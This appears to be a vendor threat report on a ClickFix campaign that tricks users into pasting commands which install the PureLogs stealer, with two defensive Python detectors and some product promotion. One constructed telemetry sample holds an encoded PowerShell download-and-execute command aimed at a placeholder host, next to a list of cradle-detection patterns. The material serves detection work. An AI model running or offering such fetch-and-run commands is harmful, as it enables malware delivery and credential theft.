Canndelta ClickFix campaign abusing Donut shellcode to deploy PureLogs stealer

Intel Name: Canndelta ClickFix campaign abusing Donut shellcode to deploy PureLogs stealer

Date of Scan: June 3, 2026

Impact: High

Summary:
Corporate security teams continuously face social engineering operations that bypass perimeter controls. The Canndelta ClickFix campaign shows how a threat group adapts its delivery chain to place an information stealer on employee endpoints. The lure exploits routine daily activity: business users regularly open web conferencing portals and collaborate across cloud workspaces, so a fake error page that asks them to "fix" a broken component does not look out of place. By having the employee paste and run a command themselves, the adversary executes the installer with the user's own privileges and without the downloaded file that attachment filters and web proxies are tuned to inspect. This ClickFix setup represents a notable evolution in corporate social engineering.

The threat actors behind this operation appear focused on credential theft, financial fraud, and maintaining access to compromised environments. Unlike ransomware groups that cause immediate operational shutdowns by encrypting local disks, these adversaries choose stealth. Their primary goal is the quiet deployment of an information stealer. Once inside the enterprise environment, the stealer works silently to capture master passwords, financial credentials, and active cloud session cookies and tokens. This sustained access lets attackers study company operations before executing deeper financial or administrative fraud.

Severe Operational Risks and Business Consequences

The business impact of letting an unmonitored information stealer remain inside your infrastructure is immense. When attackers compromise corporate workstations, your compliance and risk posture degrades immediately. The hidden presence can lead to regulatory fines, litigation costs, and the loss of protected business secrets. Stolen browser cookies let attackers impersonate senior executives to authorize fraudulent wire transfers or manipulate supply chain documents, because a replayed session cookie bypasses the password and MFA prompt entirely. For a Chief Information Security Officer, this threat requires moving past static perimeter controls toward continuous internal behavioral monitoring.

How a Deceptive ClickFix Campaign Manipulates System Controls

To build a reliable defense, enterprise leaders must understand how this delivery method operates. The chain usually begins when a worker encounters a realistic notification or a fake browser error page. The text claims that a vital system component, or a font required to display a document, failed to load. To "resolve" the issue, the page displays clear step-by-step instructions that walk the employee through compromising their own machine.

The user clicks a button and the page's script silently copies a command string into the clipboard; the user never sees its contents. The instructions then tell the worker to open the system's command terminal and paste the string into the prompt. The deception works like an unauthorized facility maintenance vendor: an office manager receives a realistic looking work order from an external building authority, but an impostor has intercepted the standard forms and replaced them with a package of modified instructions. The manager follows the text because a routine facility review is expected that day, and so personally walks the hidden tracking equipment past the security barriers.

The Inner Mechanics of Memory Resident Execution

Once the worker pastes the command into the console, the shell executes an encoded script that starts a quiet download routine. Instead of writing a single large and obvious malware binary to disk, the package deploys small loaders. These loaders abuse legitimate, signed operating system tools (living-off-the-land binaries) to perform actions that static security rules do not alert on. Because built-in administrative tools do the work, the attack creates no new suspicious executable for signature-based antivirus to flag.

The code then assembles and executes its key components in memory, reducing its reliance on files stored on disk and therefore on file-based detection. The stealer also carries automated defense evasion routines that inspect the local environment before capturing data: if it detects signs of a sandbox or analysis box, it pauses or behaves benignly. Once it confirms it is running on a real user's machine, it may establish persistence through operating system autostart mechanisms that survive a reboot.
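The chain described above leaves a recognisable shape in process-creation telemetry: a script host started by the user's own file manager or browser (the paste), an encoded command line, a hidden window, and a fetch-and-run or in-memory loading cradle. The following is an added example for this report, not Gurucul's code and not code recovered from the campaign. It scores Sysmon Event ID 1 style records modelled as dicts; the sample events, the encoded command and the `lure.example.invalid` URL are constructed for illustration.

```python
"""Triage process-creation telemetry for ClickFix-style execution.

Added example for this report; not Gurucul's code and not code recovered
from the campaign. It models Sysmon Event ID 1 style records as dicts and
scores the pattern the text describes: a script host started from an
interactive parent (the user pasting into a shell), an encoded command
line, a hidden window, and a download or in-memory execution cradle.
All events below are constructed.
"""
import base64
import re
from typing import Dict, List, Optional

# A parent that means "a person launched this", not a service or installer.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Script hosts ClickFix lures typically hand the pasted string to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Tokens that indicate fetch-and-run or in-memory loading rather than routine admin use.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
    r"invoke-webrequest", r"\biwr\b", r"start-bitstransfer",
    r"frombase64string", r"reflection\.assembly", r"virtualalloc",
]
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation record; each independent signal adds one point."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    text = (decoded or cmdline).lower()      # inspect the decoded form when there is one
    reasons: List[str] = []
    if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS:
        reasons.append(f"{image} spawned by interactive parent {parent}")
    if decoded is not None:
        reasons.append("base64 -EncodedCommand")
    if HIDDEN_FLAG.search(cmdline):
        reasons.append("hidden window")
    hits = [p for p in CRADLE_PATTERNS if re.search(p, text)]
    if hits:
        reasons.append("cradle tokens: " + ", ".join(hits))
    return {"score": len(reasons), "reasons": reasons, "decoded": decoded}


def triage(events: List[Dict[str, str]], threshold: int = 3) -> List[Dict[str, object]]:
    """Return scored alerts for events at or above threshold, highest score first."""
    out = []
    for ev in events:
        s = score_event(ev)
        if s["score"] >= threshold:
            out.append({**s, "image": ev["Image"], "parent": ev["ParentImage"]})
    return sorted(out, key=lambda a: a["score"], reverse=True)


def _encode(ps: str) -> str:
    """Encode a PowerShell string the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry. The URL uses a reserved example domain.
SAMPLE_EVENTS = [
    {   # benign: user opens a text file
        "Image": "C:\\Windows\\System32\\notepad.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "notepad.exe report.txt",
    },
    {   # low score: an ordinary interactive PowerShell session
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "powershell.exe Get-ChildItem C:\\Temp",
    },
    {   # ClickFix-style: hidden, encoded, fetch-and-run, launched by the user
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "powershell.exe -w hidden -enc " + _encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/fix.ps1')"),
    },
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], alert["reasons"])
        print("  decoded:", alert["decoded"])
```

Only the third event crosses the default threshold; the interactive PowerShell session scores one point, which is why the signals are counted rather than any single one treated as malicious. If the lure in your environment directs users to the Windows Run dialog rather than a terminal (an assumption, not something this report states), the pasted string is also recorded under the user's `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key, which gives responders a cheap host-side check to confirm the paste took place.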

Better Corporate Security with Continuous Behavioral Surveillance

Organizations must update their protective posture with continuous behavioral monitoring to counter these desktop-based threats. Traditional controls struggle with ClickFix because the initial action is performed willingly by the user, and because the endpoint uses native administrative programs to stage the payload, so signature-based rules stay quiet. Security operations teams need analytics that evaluate the context of system behavior in real time, so they notice when a standard user application such as a file manager or browser begins spawning shells that perform anomalous download and execution tasks.

Proactive Defense Using Identity Threat Detection and Response

Defending an enterprise from stealthy information stealers requires an integrated structure that includes identity threat detection and response at every layer. Once a stealer gains a foothold on an endpoint, one of its main objectives is to harvest cloud credentials and session tokens. If your security team relies only on point-in-time password checks, it will miss the early indicator of a compromised identity: a valid session being reused from somewhere it was never issued. Organizations must analyze authentication logs alongside endpoint telemetry to spot credential misuse. This approach ensures that if an attacker attempts to use copied access keys or session tokens from an unverified location, the platform revokes the session immediately.
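The identity check this section calls for can be expressed as a binding rule: at MFA login a session is tied to the network origin and client that minted it, and any later use of that session from a different origin is a replay candidate. The block below is an added example for this report, not Gurucul platform code. The `AuthEvent` shape, the ASN labels (assumed to be enriched from the source IP upstream) and the sample events are all constructed; the IPs and ASNs come from ranges reserved for documentation.

```python
"""Flag reuse of a cloud session from an origin it was never issued to.

Added example for this report, not Gurucul platform code. Each session is
bound at MFA login to the autonomous system and client that minted it;
later use of the same session from a different AS or client, use of a
session with no login on record, or use past a maximum age is raised as
an alert with a recommended revoke. Events are constructed, and the ASN
field is assumed to be enriched from src_ip before the events arrive here.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    user: str
    session_id: str
    src_ip: str
    asn: str           # e.g. "AS64496"; assumed enriched from src_ip upstream
    user_agent: str
    kind: str          # "login_mfa" (session minted after MFA) or "api_call"


@dataclass(frozen=True)
class Alert:
    session_id: str
    user: str
    ts: datetime
    reason: str
    action: str = "revoke_session"


def detect_session_replay(events: List[AuthEvent],
                          max_age: timedelta = timedelta(hours=12)) -> List[Alert]:
    """Bind each session to its MFA-login origin; alert on later use that breaks the binding."""
    bindings: Dict[str, AuthEvent] = {}
    alerts: List[Alert] = []
    for e in sorted(events, key=lambda x: x.ts):
        if e.kind == "login_mfa":
            bindings[e.session_id] = e          # (re)bind on every fresh MFA login
            continue
        origin = bindings.get(e.session_id)
        if origin is None:
            alerts.append(Alert(e.session_id, e.user, e.ts,
                                "session used with no MFA login on record"))
        elif e.asn != origin.asn or e.user_agent != origin.user_agent:
            alerts.append(Alert(e.session_id, e.user, e.ts,
                                f"session minted from {origin.asn}/{origin.user_agent!r} "
                                f"reused from {e.asn}/{e.user_agent!r}"))
        elif e.ts - origin.ts > max_age:
            alerts.append(Alert(e.session_id, e.user, e.ts,
                                f"session older than {max_age} still in use"))
    return alerts


# Constructed sample log. 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges; AS64496 and AS64500 are ASNs reserved for documentation.
T0 = datetime(2026, 6, 3, 9, 0)
CHROME = "Mozilla/5.0 (Windows NT 10.0) Chrome/125"
SAMPLE_EVENTS = [
    AuthEvent(T0, "alice", "sess-1", "203.0.113.10", "AS64496", CHROME, "login_mfa"),
    AuthEvent(T0 + timedelta(minutes=5), "alice", "sess-1", "203.0.113.10", "AS64496", CHROME, "api_call"),
    # the stolen cookie replayed from attacker infrastructure with a scripted client
    AuthEvent(T0 + timedelta(minutes=40), "alice", "sess-1", "198.51.100.7", "AS64500",
              "python-requests/2.31", "api_call"),
    # a session never seen being minted: forged, or imported from outside the log window
    AuthEvent(T0 + timedelta(hours=1), "bob", "sess-9", "203.0.113.22", "AS64496", CHROME, "api_call"),
]

if __name__ == "__main__":
    for a in detect_session_replay(SAMPLE_EVENTS):
        print(a.ts.isoformat(), a.user, a.session_id, a.action, "-", a.reason)
```

The binding is keyed on autonomous system rather than exact IP so that ordinary address churn inside one ISP does not alert, while a cookie carried off to a different network does. The user-agent comparison catches the common case where the stolen session is replayed by a script rather than the browser that created it; a determined attacker can copy the user agent, so treat it as one signal among several, as the scoring in the previous section does.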

Stopping Modular Deception via the Gurucul Platform

Eradicating a highly evasive ClickFix campaign requires a shift away from legacy security models. This is where the Gurucul Security Analytics Platform helps organizations transform their defensive operations. Instead of searching for known file signatures or static indicators of compromise, Gurucul applies user and entity behavior analytics. By building an operational baseline for every identity and system on the network, the platform flags the small anomalies that occur during an intrusion.

The Gurucul Security Analytics Platform evaluates data across identity stores, endpoint tools, and cloud infrastructure. When a pasted script package alters configuration parameters or reads process memory, Gurucul catches the anomalous sequence. The platform connects these minor indicators across multiple phases, raising a risk score before data exfiltration can take place. This automated context lets your security operations center isolate the affected system early in the attack.

This analytics approach removes the blind spots legacy platforms have with fileless intrusions. Because Gurucul reviews the contextual intent of system behavior rather than the specific code layout, the packaging of the payload does not matter. The platform tracks the behavioral footprint of the attack, such as unexpected administrative command execution or unusual outbound data transfers, and that visibility lets analysts stop the campaign before the adversary can compromise sensitive credentials.

To see the complete technical breakdown of the multi-stage delivery architecture and explore the indicator maps for this threat, read the full research report on our community.
